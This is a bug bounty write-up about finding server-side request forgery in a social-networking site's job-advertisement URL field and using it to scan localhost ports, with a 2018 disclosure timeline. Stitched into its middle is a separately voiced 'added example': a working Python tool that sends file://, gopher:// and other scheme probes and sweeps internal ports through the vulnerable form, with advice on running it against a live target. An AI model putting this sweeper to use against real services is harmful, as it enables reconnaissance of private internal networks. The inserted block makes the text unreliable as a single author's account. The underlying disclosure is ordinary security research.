Hello guys, this is Deepak Holani (#appsec).
This is my first write-up, hope you like it.
I was testing a private program. The domain was in limited scope; it is related to social networking.
I was looking for server-side issues and saw a box for adding a URL for a job advertisement. The first thing that came to my mind was to try for SSRF here.
What you can do with an SSRF depends on where you find it and what the vulnerable server is allowed to reach.
Some of the things an SSRF can be used for:
- Abuse the trust relationship between the vulnerable server and others.
- Bypass IP whitelisting.
- Bypass host-based authentication services.
- Read resources which are not accessible to the public.
- Scan the internal network to which the server is connected.
- Read files from the web server.
- View Status Pages and interact with APIs as the web server.
- Retrieve sensitive information such as the IP address of a web server behind a reverse proxy.
So, as I said, it was a kind of social networking site. The job-posting URL box is shown below.
When I tested for a port scan simply with localhost (127.0.0.1) and different ports, the web page was not showing any error, and it was not showing me whether a port was open or closed. But we have our cool friend Burp.
In addition to http://, I tried the other URL schemes to read resources and make the server perform actions (file:///, dict://, ftp://, ldap:// and gopher://).
However, only http:// was working, so I opened my Burp.
- I had two choices to check it: first with Burp Collaborator (you can read more about it in the Burp Collaborator documentation), and the other a manual check port by port.
I checked the target; below is the request and response.
Note: if you do not have a VPS, … the Collaborator Everywhere extension in Burp can help you with testing.
So that gave me the idea that there is SSRF.
So I decided to check whether ports were open or closed.
As only https:// was allowed,
I first checked port 443 >> 127.0.0.1:443
which gave me 400 Bad Request.
Now what? I checked another port, 22 >> 127.0.0.1:22
In this way I found many ports open and closed, and scanned all the ports, which gave
201 and 400 responses.
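To make the open/closed check above repeatable, here is an added Python example (my code, not the author's): it generates the scheme probes mentioned earlier, sweeps ports on 127.0.0.1 through the vulnerable URL field, and sorts each response into open, closed or filtered using the 201/400 signal described in this write-up. The form endpoint, the parameter name, the "connection refused" markers and the timeout threshold are assumptions; the canned responses are constructed so the script runs offline.

```python
"""Port sweep through an SSRF-able URL field.

Added example; not code from the original write-up. The form endpoint,
parameter name, loopback target and the status-code mapping are assumptions.
"""
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, List, Tuple

# A fetcher submits one candidate URL through the vulnerable form and returns
# (http_status, response_body, seconds_elapsed). Keeping it pluggable lets the
# same sweep run offline against canned responses (see canned_fetcher below).
Fetcher = Callable[[str], Tuple[int, str, float]]

SCHEMES = ["http", "https", "file", "dict", "ftp", "ldap", "gopher"]
CLOSED_MARKERS = ("connection refused", "econnrefused", "could not connect")
SLOW_SECONDS = 5.0  # assumed: slower than this suggests a dropped SYN (filtered)


def scheme_payloads(host: str = "127.0.0.1", port: int = 80) -> List[str]:
    """One URL per scheme, to learn which schemes the server will actually fetch."""
    return [f"{scheme}://{host}:{port}/" for scheme in SCHEMES]


def classify(status: int, body: str, elapsed: float) -> str:
    """Turn one response into an open/closed/filtered verdict.

    Assumed mapping, modelled on the write-up's signal:
    201 = the fetch succeeded (an HTTP listener answered);
    400 = the server connected but got something that was not HTTP
          (a TLS or SSH banner), so the port is open anyway;
    a 'connection refused' style body = closed; a long delay = filtered.
    """
    if elapsed >= SLOW_SECONDS:
        return "filtered"
    if any(marker in body.lower() for marker in CLOSED_MARKERS):
        return "closed"
    if status == 201:
        return "open (http)"
    if status == 400:
        return "open (non-http)"
    return f"unknown ({status})"


def sweep(fetcher: Fetcher, ports: Iterable[int], host: str = "127.0.0.1",
          scheme: str = "http") -> Dict[int, str]:
    """Probe each port via the SSRF and record the verdict per port."""
    results: Dict[int, str] = {}
    for port in ports:
        try:
            status, body, elapsed = fetcher(f"{scheme}://{host}:{port}/")
        except TimeoutError:
            status, body, elapsed = 0, "", SLOW_SECONDS
        results[port] = classify(status, body, elapsed)
    return results


def live_fetcher(endpoint: str, param: str = "url",
                 timeout: float = SLOW_SECONDS + 1) -> Fetcher:
    """Fetcher that POSTs the candidate URL to the job-posting form.

    `endpoint` and `param` are placeholders; point them at the real form.
    """
    def fetch(candidate: str) -> Tuple[int, str, float]:
        data = urllib.parse.urlencode({param: candidate}).encode()
        req = urllib.request.Request(endpoint, data=data, method="POST")
        start = time.monotonic()
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                body = resp.read().decode(errors="replace")
                return resp.status, body, time.monotonic() - start
        except urllib.error.HTTPError as err:  # 4xx/5xx still carry a useful body
            body = err.read().decode(errors="replace")
            return err.code, body, time.monotonic() - start
        except (urllib.error.URLError, TimeoutError) as err:
            return 0, str(err), time.monotonic() - start
    return fetch


# Constructed responses for an offline run; they mirror the pattern in the
# write-up (443 and 22 answer 400, an HTTP port answers 201). Not real data.
CANNED: Dict[str, Tuple[int, str, float]] = {
    "http://127.0.0.1:443/": (400, "Bad Request", 0.2),   # TLS listener, not HTTP
    "http://127.0.0.1:22/": (400, "Bad Request", 0.3),    # SSH banner, not HTTP
    "http://127.0.0.1:8080/": (201, "Created", 0.4),      # an HTTP service answered
    "http://127.0.0.1:9999/": (500, "Error: Connection refused", 0.1),
}


def canned_fetcher(candidate: str) -> Tuple[int, str, float]:
    """Offline stand-in for live_fetcher; unknown ports behave as filtered."""
    if candidate not in CANNED:
        raise TimeoutError(candidate)
    return CANNED[candidate]


if __name__ == "__main__":
    for url in scheme_payloads():
        print("scheme probe:", url)
    for port, verdict in sweep(canned_fetcher, [22, 443, 8080, 9999, 3306]).items():
        print(f"127.0.0.1:{port} -> {verdict}")
```

Against a real target, swap `canned_fetcher` for `live_fetcher("https://target.example/jobs/post", "url")` and calibrate the markers and the timeout first by probing one port you know is open and one you know is closed; the 201/400 split is specific to how this application's fetcher reports errors, so check it rather than assuming it.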
Report details:
29 June 2018: Bug reported to the company.
29 June 2018: Bug triaged by the team.
29 June 2018: Bug fixed.
2 July 2018: Rewarded me a cool bounty, and
the program will launch on HackerOne soon.
Feel free to ask any questions about this.